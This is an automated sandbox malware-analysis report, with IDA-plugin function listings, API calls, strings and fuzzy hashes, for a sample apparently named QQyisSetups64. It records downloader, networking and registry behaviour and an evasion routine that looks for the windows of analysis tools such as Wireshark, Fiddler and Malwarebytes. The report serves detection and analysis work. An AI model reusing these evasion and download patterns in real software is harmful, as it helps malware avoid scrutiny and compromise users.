
Strings

D, xrefs: 0378C576
WinSta0\Default, xrefs: 0378C582
%s\shell\open\command, xrefs: 0378C496
"%1, xrefs: 0378C50D

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 3970221696-33419044
Opcode ID: 2ff0fa35aefb82dfc8a28ca63567eeb9306a8bc4635a9fd78f3f663c68b7db41
Instruction ID: ac8b06cbd46ae32c1ac644ff6bf02918ec343c284553a05828aaa9909d7fa7b2
Opcode Fuzzy Hash: 2ff0fa35aefb82dfc8a28ca63567eeb9306a8bc4635a9fd78f3f663c68b7db41
Instruction Fuzzy Hash: FF51ECB5A8031D66DF20FB64DC49FEEB7789F54710F004599E70DAA081EA749684CFB1

Function 03787C80 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 141libraryloaderfileCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wininet.dll), ref: 03787CC3
GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03787CD7
FreeLibrary.KERNEL32(00000000), ref: 03787CF7
GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03787D16
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03787D53
_memset.LIBCMT ref: 03787D7E
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03787D8C
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03787DDB
CloseHandle.KERNEL32(?), ref: 03787DF9
Sleep.KERNEL32(00000001), ref: 03787E01
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03787E0D
FreeLibrary.KERNEL32(00000000), ref: 03787E28

Strings

InternetOpenUrlW, xrefs: 03787D10
InternetReadFile, xrefs: 03787D86
wininet.dll, xrefs: 03787CA6
InternetCloseHandle, xrefs: 03787E07
MSIE 6.0, xrefs: 03787CE1
InternetOpenW, xrefs: 03787CD1

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 1463273941-1099148085
Opcode ID: 60f73ef77f829b4b31ef83a58e1dd02cf1561b213399b717c3f8abf7695ade3a
Instruction ID: 74882c38b7170155afb8afa737488576fe14d99f658da769471199345bcee77f
Opcode Fuzzy Hash: 60f73ef77f829b4b31ef83a58e1dd02cf1561b213399b717c3f8abf7695ade3a
Instruction Fuzzy Hash: 0041B571A8061CABD724EB648C41FEEB3F8BF84700F14C5A9E649A6180DE745A458FE4

Function 03784530 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 0378455A
timeGetTime.WINMM ref: 0378457B
GetCurrentThreadId.KERNEL32 ref: 0378459B
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 037845BD
SwitchToThread.KERNEL32 ref: 037845D7
SetEvent.KERNEL32(?), ref: 03784620
CloseHandle.KERNEL32(?), ref: 03784644
send.WS2_32(?,037A49C0,00000010,00000000), ref: 03784668
SetEvent.KERNEL32(?), ref: 03784686
InterlockedExchange.KERNEL32(?,00000000), ref: 03784691
WSACloseEvent.WS2_32(?), ref: 0378469F
shutdown.WS2_32(?,00000001), ref: 037846B3
closesocket.WS2_32(?), ref: 037846BD
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 037846F6
SetLastError.KERNEL32(000005B4), ref: 0378470A
GetCurrentThreadId.KERNEL32 ref: 0378472B
InterlockedExchange.KERNEL32(?,00000001), ref: 03784743

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
String ID:
API String ID: 1692523546-0
Opcode ID: becca5bf8f31025d59993257870126da4d59b812d4718422f08e9c934a0ead02
Instruction ID: 373ad21def5fe24fb365f6fa444156be7d5c573eced1a84dcf4344cbb2e85c15
Opcode Fuzzy Hash: becca5bf8f31025d59993257870126da4d59b812d4718422f08e9c934a0ead02
Instruction Fuzzy Hash: 7291D074640B06EFC724EF26D888BAAF7A9FF44700F148519E5168BA84D7B5F891CBD0

Function 0378A6F0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 254COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0378A748
_memset.LIBCMT ref: 0378A788
_memset.LIBCMT ref: 0378A80E
swprintf.LIBCMT ref: 0378A82D

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

_memset.LIBCMT ref: 0378A905
swprintf.LIBCMT ref: 0378A924
_memset.LIBCMT ref: 0378A986
swprintf.LIBCMT ref: 0378A9A5

Strings

%s %s, xrefs: 0378A81C, 0378A890, 0378A913, 0378A994
onlyloadinmyself, xrefs: 0378A71C
plugmark, xrefs: 0378A75B

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: _memset$swprintf$_malloc
String ID: %s %s$onlyloadinmyself$plugmark
API String ID: 1873853019-591889663
Opcode ID: 832ce470dba4f7c0ce2d477d088d548af2410064a66793fa5db554db2c5c5ec4
Instruction ID: c9d8b1612ee0a56ca8c9cd3cd256a2d6ea9415e7299856d6d4083d111b35a987
Opcode Fuzzy Hash: 832ce470dba4f7c0ce2d477d088d548af2410064a66793fa5db554db2c5c5ec4
Instruction Fuzzy Hash: 4181B5B9A80300ABEB10FF14EC8AF6B7764AF55710F184169ED195F383E771E911C6A2

Function 03785CC0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 164windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 03785CD3

Strings

TCPEye, xrefs: 03785D49
Fiddler, xrefs: 03785E0F
Malwarebytes, xrefs: 03785D33
CurrPorts, xrefs: 03785D75
TaskExplorer, xrefs: 03785D5F
Metascan, xrefs: 03785DA1
ApateDNS, xrefs: 03785D1D
Wireshark, xrefs: 03785DB7
Process, xrefs: 03785E6D
Sniff, xrefs: 03785E49
Port, xrefs: 03785D8B
Capsa, xrefs: 03785E37, 03785E5B

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: VisibleWindow
String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
API String ID: 1208467747-3439171801
Opcode ID: 9c5605045a94aae60822ce5207fe9ed208529c410d24882d77f15b1cdc4dc536
Instruction ID: 9fe05f481927fbbf13571af6681c52de59136b3e8cbbec5ab45f781cebcd1bc7
Opcode Fuzzy Hash: 9c5605045a94aae60822ce5207fe9ed208529c410d24882d77f15b1cdc4dc536
Instruction Fuzzy Hash: 6941BFE6EC1B156AEE62FA3A7C06FDF314C0DA34B6F090226EC48AC105F649921540EE

Function 02C84530 Relevance: 24.2, APIs: 16, Instructions: 180threadnetworksleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02C8455A
timeGetTime.WINMM ref: 02C8457B
GetCurrentThreadId.KERNEL32 ref: 02C8459B
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C845BD
SwitchToThread.KERNEL32 ref: 02C845D7
SetEvent.KERNEL32(?), ref: 02C84620
CloseHandle.KERNEL32(?), ref: 02C84644
send.WS2_32(?,02C97440,00000010,00000000), ref: 02C84668
SetEvent.KERNEL32(?), ref: 02C84686
InterlockedExchange.KERNEL32(?,00000000), ref: 02C84691
WSACloseEvent.WS2_32(?), ref: 02C8469F
shutdown.WS2_32(?,00000001), ref: 02C846B3
closesocket.WS2_32(?), ref: 02C846BD
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02C846F6
SetLastError.KERNEL32(000005B4), ref: 02C8470A
GetCurrentThreadId.KERNEL32 ref: 02C9FA44

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
String ID:
API String ID: 3448239111-0
Opcode ID: 08385932a098717e15b71ce20b63fb303f9890e20f53e40ae42869245a261d1e
Instruction ID: 66a22edad97b9b14a80f6353bb7fafe7210f3df72dbcb607fe7528510f354a0e
Opcode Fuzzy Hash: 08385932a098717e15b71ce20b63fb303f9890e20f53e40ae42869245a261d1e
Instruction Fuzzy Hash: B051FC71A40612EFC739EF64D88CBA9B7A5FF84749F408625E50187A80C774FAA1CBD0

Function 0378DA30 Relevance: 21.3, APIs: 14, Instructions: 254COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,0378A8C1,?,?), ref: 0378DA43
SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,0378A8C1,?,?), ref: 0378DA62

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: cf98c28d13462270ddd523fec1996e1f4117be55b0baec8ec6b8897d4c91a5c3
Instruction ID: 6f810af9cdcfe10dc400eeb85f695dd488aff1de3bc97c9ef32ac6d5d0002516
Opcode Fuzzy Hash: cf98c28d13462270ddd523fec1996e1f4117be55b0baec8ec6b8897d4c91a5c3
Instruction Fuzzy Hash: 0581E372740605AFD730EFA9D884BAAB7E4FB48315F148569E909C7AC1E775E800CBD1

Function 0378C5E0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0378C63D
_memset.LIBCMT ref: 0378C64C
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 0378C66F

Part of subcall function 0378C81E: RegCloseKey.ADVAPI32(80000000,0378C7FA), ref: 0378C82B
Part of subcall function 0378C81E: RegCloseKey.ADVAPI32(00000000), ref: 0378C834

Strings

%08X, xrefs: 0378C7D5

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Close_memset$Open
String ID: %08X
API String ID: 4292648718-3773563069
Opcode ID: c2c5f8d2b5ed8a6a4625b067ef2bc145dcc351526bddb05f84e55c81860eb56f
Instruction ID: ad54866f7ee694c59b03ed84967f9b1cdeb13d238d211b72884b17eafb030875
Opcode Fuzzy Hash: c2c5f8d2b5ed8a6a4625b067ef2bc145dcc351526bddb05f84e55c81860eb56f
Instruction Fuzzy Hash: 255144F2A40219ABDB24EF50DC85FEAB778EB44714F40869DF705A6180D774AB44CBA4

Function 037836F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 03783710
WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03783749
setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03783766
setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03783779
WSACreateEvent.WS2_32 ref: 0378377B
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,037B1F0C), ref: 0378378D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,037B1F0C), ref: 03783799
lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,037B1F0C), ref: 037837B8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,037B1F0C), ref: 037837C4
gethostbyname.WS2_32(00000000), ref: 037837D2
htons.WS2_32(?), ref: 037837F8
WSAEventSelect.WS2_32(?,?,00000030), ref: 03783816
connect.WS2_32(?,?,00000010), ref: 0378382B
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,037B1F0C), ref: 0378383A

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
String ID:
API String ID: 1455939504-0
Opcode ID: a98f9c5eb8ec943e3dfdffdb64bf263dc404b939d425f52885a85b2cf7ed3613
Instruction ID: ea616fd76319886af4143f2b0a6bce4d3ad3af7ce48cae51e4f2bb874e752a44
Opcode Fuzzy Hash: a98f9c5eb8ec943e3dfdffdb64bf263dc404b939d425f52885a85b2cf7ed3613
Instruction Fuzzy Hash: 30415E75A40205ABE724EBA4DC89F7BB7B8EB89B10F104919F7159A2C1C774A900DB61

Function 02C836F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 02C83710
WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02C83749
setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02C83766
setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02C83779
WSACreateEvent.WS2_32 ref: 02C8377B
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02C9D990), ref: 02C8378D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02C9D990), ref: 02C83799
lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02C9D990), ref: 02C837B8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02C9D990), ref: 02C837C4
gethostbyname.WS2_32(00000000), ref: 02C837D2
htons.WS2_32(?), ref: 02C837F8
WSAEventSelect.WS2_32(?,?,00000030), ref: 02C83816
connect.WS2_32(?,?,00000010), ref: 02C8382B
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02C9D990), ref: 02C8383A

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
String ID:
API String ID: 1455939504-0
Opcode ID: fc0e2c650aabd6955bb1f752be8a859d595c3e2f688b605ccca17a7e52f9dde7
Instruction ID: 4cc43e4de4ab3bea8181f8cd2f6e7bc7db5a2cb94ea8e8e8b7043e3674ffdea1
Opcode Fuzzy Hash: fc0e2c650aabd6955bb1f752be8a859d595c3e2f688b605ccca17a7e52f9dde7
Instruction Fuzzy Hash: 42416FB1A40244ABE710EFA5DC89F7FB7B8EF88714F508619FA15A72C0C771A904CB61

Function 02885497 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0288551F
_memset.LIBCMT ref: 02885640
_memset.LIBCMT ref: 02885664
_memset.LIBCMT ref: 02885676

Strings

!jWW, xrefs: 02885607
., xrefs: 02885611
_, xrefs: 02885625
i, xrefs: 0288562F
e, xrefs: 028854B3
l, xrefs: 0288561B
{vU_, xrefs: 028855FD

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: _memset
String ID: !jWW$.$_$e$i$l${vU_
API String ID: 2102423945-159827627
Opcode ID: 616728f120ea76b6708cf09b79b5274985df2719d774fb6e82631f5eb7c08bb3
Instruction ID: 8e66d5d846fb1e7c39b5ea00a394b92d49156e6723a59621ff660ba35d948a1a
Opcode Fuzzy Hash: 616728f120ea76b6708cf09b79b5274985df2719d774fb6e82631f5eb7c08bb3
Instruction Fuzzy Hash: 5091A87DA40214AFE720EF64CC84FAA77BAFB85700F548159FA099B244D7B5DA40CF61

Function 0378AA10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190sleeptimeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,453DC9E3), ref: 0378AA58
wsprintfW.USER32 ref: 0378AA8F
_memset.LIBCMT ref: 0378AAA7
_memset.LIBCMT ref: 0378AABA

Part of subcall function 03788020: lstrlenW.KERNEL32(?), ref: 03788038
Part of subcall function 03788020: _memset.LIBCMT ref: 03788042
Part of subcall function 03788020: lstrlenW.KERNEL32(?), ref: 0378804B
Part of subcall function 03788020: lstrlenW.KERNEL32(?), ref: 03788056

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0378ABBE
Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 0378AC6E
CloseHandle.KERNEL32(?), ref: 0378ACAA

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

Part of subcall function 03789730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,453DC9E3,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E,00000000), ref: 03789773
Part of subcall function 03789730: InitializeCriticalSectionAndSpinCount.KERNEL32(0378E1AE,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789812
Part of subcall function 03789730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789850

Strings

t1:, xrefs: 0378AAF3
o1:, xrefs: 0378AAE2
p1:, xrefs: 0378AACE
%4d.%2d.%2d-%2d:%2d:%2d, xrefs: 0378AA89

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
API String ID: 1254190970-1225219777
Opcode ID: 39b588cded6fb802f6b9678920eb3083cd1928cb83964f40cefa8556d3f70f9f
Instruction ID: 682e2cc47d2f30c2c06baaedc11f503ad6d26ec3a692a06749c9796de89d5295
Opcode Fuzzy Hash: 39b588cded6fb802f6b9678920eb3083cd1928cb83964f40cefa8556d3f70f9f
Instruction Fuzzy Hash: 6961A1F1548340AFD760EF68DC84EABB7E9BBC9614F104A1DF19987281E7349944CBA3

Function 0378C860 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 0378C889
RegDeleteValueW.ADVAPI32(?), ref: 0378C894
RegCloseKey.ADVAPI32(?), ref: 0378C8A4
RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 0378C8C3
lstrlenW.KERNEL32(?), ref: 0378C8D1
RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0378C8E4
RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0378C8F2
RegCloseKey.ADVAPI32(?), ref: 0378C900

Strings

AppEvents, xrefs: 0378C86F, 0378C883, 0378C8AD, 0378C8BD
Network, xrefs: 0378C876, 0378C8B4

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Close$Value$CreateDeleteOpenlstrlen
String ID: AppEvents$Network
API String ID: 3935456190-3733486940
Opcode ID: fe9157b0c32a62a35c3362da442f71d00ce4b652281bdc199f1b414edcf7cb63
Instruction ID: 3b321db12ef3e178a29c0c5d3aa6f44d0c7a8c477013f4445dcafa8b9d387f41
Opcode Fuzzy Hash: fe9157b0c32a62a35c3362da442f71d00ce4b652281bdc199f1b414edcf7cb63
Instruction Fuzzy Hash: 1C116075B40608FBE724EBA8DC89FABB36CEB85610F104559FA0197241D6759E00E7B4

Function 0360A0AF Relevance: 16.8, APIs: 11, Instructions: 254COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0360A107
_memset.LIBCMT ref: 0360A147
_memset.LIBCMT ref: 0360A1CD
swprintf.LIBCMT ref: 0360A1EC

Part of subcall function 0360F0C6: _malloc.LIBCMT ref: 0360F0E0

_memset.LIBCMT ref: 0360A2C4
swprintf.LIBCMT ref: 0360A2E3
_memset.LIBCMT ref: 0360A345
swprintf.LIBCMT ref: 0360A364

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _memset$swprintf$_malloc
String ID:
API String ID: 1873853019-0
Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
Instruction ID: b8bb84f561a655fa35b638bf147191cc1fba597fd115efbab33452bebd6f23c7
Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
Instruction Fuzzy Hash: 2281C6B9940300ABE728EB64DC86F6B7764AF55310F184168ED195F3C2EB71E910C6EA

Function 02C85A20 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,5C2D3487), ref: 02C85A65
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C85B04
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C85B42
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C85B67
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C85C5F
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C85C80
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C85B8C

Part of subcall function 02C81280: __CxxThrowException@8.LIBCMT ref: 02C81290
Part of subcall function 02C81280: DeleteCriticalSection.KERNEL32(00000000,?,02C97E78), ref: 02C812A1

InterlockedExchange.KERNEL32(?,00000000), ref: 02C85CF1
timeGetTime.WINMM ref: 02C85CF7
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C85D0B
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C85D14

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
String ID:
API String ID: 1400036169-0
Opcode ID: 1c19386567c2ccebf9d8763f0284a8b0d054d47aa0452e63ef39902de7fd72f9
Instruction ID: c43ed6e611fb87a388c932eaf9476b3d0cc6625e7eb6c32b8531b28224a507ea
Opcode Fuzzy Hash: 1c19386567c2ccebf9d8763f0284a8b0d054d47aa0452e63ef39902de7fd72f9
Instruction Fuzzy Hash: A1A1F7B0A41A46AFD714DF6AC88479AFBE8FB08344F90862ED11DC7640D774A964CFD0

Function 03784CB0 Relevance: 16.7, APIs: 11, Instructions: 156COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,453DC9E3,?,?,?,?,00000000,000000FF,00000000), ref: 03784CE6
EnterCriticalSection.KERNEL32(?,453DC9E3,?,?,?,?,00000000,000000FF,00000000), ref: 03784D0D
SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03784D21
LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03784D28

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: a2398bb0d627ef435cd355743b5f3073ead8fd6181d867bb98628f2d9efd4e8d
Instruction ID: 071d1776fa185893cff32e348a82fa03c94c6039f6363f49376f227dda1220ea
Opcode Fuzzy Hash: a2398bb0d627ef435cd355743b5f3073ead8fd6181d867bb98628f2d9efd4e8d
Instruction Fuzzy Hash: 5751E176A44705CFC324EFA9E484A6AF7F4FB88710F008A6EE90AD7780D775A800CB51

Function 02C84C90 Relevance: 16.7, APIs: 11, Instructions: 156COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,5C2D3487,?,?,?,?,00000000,000000FF,00000000), ref: 02C84CC6
EnterCriticalSection.KERNEL32(?,5C2D3487,?,?,?,?,00000000,000000FF,00000000), ref: 02C84CED
SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02C84D01
LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02C84D08

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
